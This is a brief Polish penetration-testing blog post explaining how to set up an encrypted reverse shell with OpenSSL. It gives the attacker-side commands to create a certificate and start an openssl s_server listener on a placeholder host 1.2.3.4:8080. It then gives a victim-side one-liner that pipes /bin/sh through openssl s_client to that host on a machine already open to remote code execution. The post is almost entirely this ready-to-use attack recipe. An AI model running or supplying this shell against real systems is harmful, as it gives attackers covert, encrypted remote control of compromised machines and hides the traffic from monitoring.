Reverse shell z OpenSSL
Napisał: Patryk Krawaczyński
23/02/2020 w Pen Test Brak komentarzy. (artykuł nr 722, ilość słów: 97)
Skoro wszędzie dzisiaj mamy szyfrowanie – wypada, aby powłoki zwrotne również były szyfrowane. W celu uruchomienia serwera do nasłuchu należy wygenerować klucz oraz certyfikat na maszynie (o IP: 1.2.3.4
) służącej do ataku:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Odpalenie serwera:
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
Na atakowanej maszynie, na której mamy możliwość RCE (ang. Remote Code Execution) wydajemy polecenie:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 \ | openssl s_client -quiet -connect 1.2.3.4:8080 > /tmp/s; rm /tmp/s
Więcej informacji: RevSSL